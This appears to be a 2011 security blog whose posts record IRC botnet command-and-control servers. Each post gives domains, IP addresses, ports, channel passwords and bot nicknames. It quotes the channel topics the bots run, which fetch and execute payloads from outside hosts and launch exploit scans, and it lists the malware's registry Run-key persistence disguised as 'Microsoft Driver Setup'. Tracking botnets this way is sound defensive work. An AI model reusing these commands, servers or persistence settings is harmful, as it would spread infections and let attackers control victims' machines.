Found 1 addresses
addr: jjjjjj.ahrampress.net ip: 123.183.217.32
jjjjjj.ahrampress.net:6943
123.183.217.32 5943
123.183.217.32 6943
PASSWORD: eee
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #j
Channel: #j
Topic is '.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:\radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by minder48 on Mon Jan 17 17:58:06
# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\wjdrive32.exe"
so that wjdrive32.exe runs every time Windows starts
# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
 Microsoft Driver Setup = "%Windir%\wjdrive32.exe"
C:\WINDOWS\wjdrive32.exe
Monday, January 17, 2011
jjjjjj.ahrampress.net
Posted by Role at 1:19 AM 0 comments
Thursday, January 13, 2011
aaaa.forexinvest4.com (Updated)
Botnet IRC C&C
Found 1 addresses
addr: aaaa.forexinvest4.com ip: 216.104.45.90
aaaa.forexinvest4.com:6939
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00
Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe
Posted by Role at 1:00 AM 0 comments
Monday, January 10, 2011
aaaa.forexinvest4.com
Botnet IRC C&C
Found 2 addresses
addr: aaaa.forexinvest4.com ip: 109.196.130.66
addr: aaaa.forexinvest4.com ip: 109.196.130.50
aaaa.forexinvest4.com:6939
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00
Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe
Posted by Role at 11:28 PM 0 comments